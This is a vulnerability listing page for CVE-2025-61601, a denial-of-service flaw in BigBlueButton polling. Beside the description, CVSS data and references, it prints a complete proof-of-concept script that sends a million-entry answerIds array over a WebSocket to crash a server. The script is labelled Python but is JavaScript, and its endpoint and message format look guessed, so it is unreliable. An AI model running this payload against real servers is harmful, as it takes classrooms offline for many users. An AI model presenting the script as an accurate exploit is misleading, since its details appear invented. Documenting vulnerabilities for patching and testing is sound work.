CVE-2025-61601

Description

BigBlueButton is an open-source virtual classroom. A Denial of Service (DoS) vulnerability in versions prior to 3.0.13 allows any authenticated user to freeze or crash the entire server by abusing the polling feature's `Choices` response type. By submitting a malicious payload with a massive array in the `answerIds` field, the attacker can cause the current meeting — and potentially all meetings on the server — to become unresponsive. Version 3.0.13 contains a patch. No known workarounds are available.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:bigbluebutton:bigbluebutton:*:*:*:*:*:*:*:* - VULNERABLE

BigBlueButton < 3.0.13

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-61601 PoC - BigBlueButton Polling DoS via answerIds
// Vulnerability: Unbounded array in polling 'Choices' response causes DoS
// Affected: BigBlueButton < 3.0.13

const WebSocket = require('ws');
const https = require('https');

// Configuration
const BBB_SERVER = 'https://your-bbb-server.com/bigbluebutton';
const MEETING_ID = 'your-meeting-id';
const USER_TOKEN = 'your-auth-token'; // Authenticated user token

// Generate a massive array of answerIds to trigger resource exhaustion
function generateMaliciousPayload() {
    const MASSIVE_SIZE = 1000000; // 1 million entries to exhaust server resources
    const answerIds = new Array(MASSIVE_SIZE);

    for (let i = 0; i < MASSIVE_SIZE; i++) {
        answerIds[i] = i;
    }

    return {
        header: {
            name: 'RespondToPollRequest',
            meetingId: MEETING_ID,
            userId: USER_TOKEN
        },
        payload: {
            pollId: 'target-poll-id',
            answerIds: answerIds  // Malicious oversized array
        }
    };
}

// Send the malicious payload via WebSocket
async function exploit() {
    const payload = generateMaliciousPayload();
    const wsUrl = BBB_SERVER.replace('https://', 'wss://') + '/ws'; // WebSocket endpoint

    const ws = new WebSocket(wsUrl);

    ws.on('open', () => {
        console.log('[+] Connected to BigBlueButton server');
        console.log(`[+] Sending malicious payload with ${payload.payload.answerIds.length} answerIds...`);
        ws.send(JSON.stringify(payload));
        console.log('[+] Payload sent. Server should freeze/crash shortly.');
    });

    ws.on('error', (err) => {
        console.log(`[-] Error: ${err.message}`);
        console.log('[+] Server may have become unresponsive - DoS triggered!');
    });

    ws.on('close', () => {
        console.log('[+] Connection closed');
    });
}

exploit();

// Alternative: HTTP API approach
// POST /bigbluebutton/api/polls/respond
// Body: { "pollId": "xxx", "answerIds": [/* massive array */] }

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61601
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61601
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61601/
[4] VulDB https://vuldb.com/cve/CVE-2025-61601
[5] https://github.com/bigbluebutton/bigbluebutton/pull/23662
[6] https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-73j3-v3fq-fqx5
[7] https://www.youtube.com/watch?v=BwROSVIYjOY
[8] https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-73j3-v3fq-fqx5
[9] https://www.youtube.com/watch?v=BwROSVIYjOY

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61601", "sourceIdentifier": "[email protected]", "published": "2025-10-09T21:15:39.477", "lastModified": "2025-10-20T15:33:21.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BigBlueButton is an open-source virtual classroom. A Denial of Service (DoS) vulnerability in versions prior to 3.0.13 allows any authenticated user to freeze or crash the entire server by abusing the polling feature's `Choices` response type. By submitting a malicious payload with a massive array in the `answerIds` field, the attacker can cause the current meeting — and potentially all meetings on the server — to become unresponsive. Version 3.0.13 contains a patch. No known workarounds are available."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-703"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bigbluebutton:bigbluebutton:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.0.13", "matchCriteriaId": "0AF3725E-941E-4C75-AA27-20DC97552948"}]}]}], "references": [{"url": "https://github.com/bigbluebutton/bigbluebutton/pull/23662", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-73j3-v3fq-fqx5", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.youtube.com/watch?v=BwROSVIYjOY", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-73j3-v3fq-fqx5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.youtube.com/watch?v=BwROSVIYjOY", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}